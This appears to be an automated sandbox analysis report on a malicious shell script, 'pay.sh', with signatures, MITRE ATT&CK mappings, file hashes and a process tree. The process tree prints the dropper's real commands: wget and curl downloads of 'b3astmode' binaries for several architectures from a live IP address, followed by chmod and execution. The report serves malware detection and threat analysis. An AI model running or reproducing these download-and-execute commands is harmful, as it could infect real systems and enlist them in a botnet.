2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc

Analysis

max time kernel
9s
max time network
20s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
13-12-2024 12:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

pay.sh
Size

2KB
MD5

624b68623e669355734d1149ffd5d430
SHA1

ce07fb83638c8fa2865aa2b3d007c35902f7d96a
SHA256

2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc
SHA512

143e96f06f585f9b6702e9e33497936b5c7b2675a8e0f9aaa3b93289926491ad7e6e204b114a7ca5c09d4bbd44cf2b2b005801ca31338b10d8cbbe9301c4bb23

Score

7^/10

antivm defense_evasion discovery upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
718	chmod
746	chmod
763	chmod
689	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/B3ASTM0DE	690	B3ASTM0DE
/tmp/B3ASTM0DE	720	B3ASTM0DE
/tmp/B3ASTM0DE	747	B3ASTM0DE
/tmp/B3ASTM0DE	764	B3ASTM0DE

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-4.dat	upx
behavioral2/files/fstream-5.dat	upx

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
692	wget
703	curl
716	cat

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/b3astmode.mips	curl
File opened for modification	/tmp/b3astmode.mpsl	wget
File opened for modification	/tmp/b3astmode.mpsl	curl
File opened for modification	/tmp/b3astmode.arm4	curl
File opened for modification	/tmp/b3astmode.x86	wget
File opened for modification	/tmp/b3astmode.x86	curl
File opened for modification	/tmp/B3ASTM0DE	pay.sh
File opened for modification	/tmp/b3astmode.mips	wget

/tmp/pay.sh
/tmp/pay.sh
1⤵
- Writes file to tmp directory
PID:656
- /usr/bin/wget
  wget http://15.228.54.104/beastmode/b3astmode.x86
  2⤵
  - Writes file to tmp directory
  PID:663
- /usr/bin/curl
  curl -O http://15.228.54.104/beastmode/b3astmode.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:685
- /bin/cat
  cat b3astmode.x86
  2⤵
  PID:688
- /bin/chmod
  chmod +x B3ASTM0DE b3astmode.x86 pay.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-cLRchH
  2⤵
  - File and Directory Permissions Modification
  PID:689
- /tmp/B3ASTM0DE
  ./B3ASTM0DE
  2⤵
  - Executes dropped EXE
  PID:690
- /usr/bin/wget
  wget http://15.228.54.104/beastmode/b3astmode.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:692
- /usr/bin/curl
  curl -O http://15.228.54.104/beastmode/b3astmode.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:703
- /bin/cat
  cat b3astmode.mips
  2⤵
  - System Network Configuration Discovery
  PID:716
- /bin/chmod
  chmod +x B3ASTM0DE b3astmode.mips b3astmode.x86 pay.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-cLRchH
  2⤵
  - File and Directory Permissions Modification
  PID:718
- /tmp/B3ASTM0DE
  ./B3ASTM0DE
  2⤵
  - Executes dropped EXE
  PID:720
- /usr/bin/wget
  wget http://15.228.54.104/beastmode/b3astmode.mpsl
  2⤵
  - Writes file to tmp directory
  PID:722
- /usr/bin/curl
  curl -O http://15.228.54.104/beastmode/b3astmode.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:736
- /bin/cat
  cat b3astmode.mpsl
  2⤵
  PID:745
- /bin/chmod
  chmod +x B3ASTM0DE b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-cLRchH
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/B3ASTM0DE
  ./B3ASTM0DE
  2⤵
  - Executes dropped EXE
  PID:747
- /usr/bin/wget
  wget http://15.228.54.104/beastmode/b3astmode.arm4
  2⤵
  PID:750
- /usr/bin/curl
  curl -O http://15.228.54.104/beastmode/b3astmode.arm4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:751
- /bin/cat
  cat b3astmode.arm4
  2⤵
  PID:761
- /bin/chmod
  chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-cLRchH
  2⤵
  - File and Directory Permissions Modification
  PID:763
- /tmp/B3ASTM0DE
  ./B3ASTM0DE
  2⤵
  - Executes dropped EXE
  PID:764
- /usr/bin/wget
  wget http://15.228.54.104/beastmode/b3astmode.arm5
  2⤵
  PID:765

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/B3ASTM0DE

Filesize
23KB

MD5
6fdcdf8e1a1d76e45fa874a20a18b804

SHA1
8f8253e997ac2997a16e3a189f441d30d9a7675c

SHA256
f7596984321fc1661a09c06d7da23513d21ab87ce7d3b2fed655ee1815288057

SHA512
d9e44d922034cde7f8504d603326c58d3e3a37e3362384e8c528430421839ffcac379711172da673e734d01e7c26e81ef97b6ebb0d1245f690639622c89834bc

Download Submit
/tmp/B3ASTM0DE

Filesize
24KB

MD5
8e2bc890571386d49be504c19d6ae5f4

SHA1
ec10343c39481e9867cab49607feb8351baa17dd

SHA256
e5baf9cce449b61fe75c5bc6ceb2c0f82d4849d0827148bd33a6a1fb8f4b98a2

SHA512
75b232d0f4c28b33ec01f0c27bd4e73ddb17d007b6531a63266e08f32c6a8fbe1811aa7570c874c298a117edf31c2f2e191b35d628c65eed45ad723c718db4af

Download Submit
/tmp/B3ASTM0DE

Filesize
275B

MD5
8a052866f3090135b18f374ce1049566

SHA1
cc858d4367e62558a09416f9521c159ec02ce42f

SHA256
efb22cd5a845c646f8c7516e4d0936eca928b961da2d866a75aa4b2626fb6120

SHA512
0b8541f9fa9dce7430684e0c788f798667bba45373c66436226a04e32494a3b62520b8289ce49001009e429153aa2c27c8e4cd794c59f6eef65ab0aa818a9d16

Download Submit
/tmp/b3astmode.x86

Filesize
22KB

MD5
873c6ba01596fdbb9c469fe1e0180243

SHA1
9236be2f17ba4d7422bf8f579d95c6226d3eaa48

SHA256
9959896b86d7dcb455c0f9d61ba74b19a3dc638ad08b51c4038ea5f092846170

SHA512
f218dc4f64b089abae03e2c996d016e71021cb353d35c034db147b4b083453085ee74273d119dc6e7440b5ccad2e00acaada435a10910a6af4a92f071a0ed1ee

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads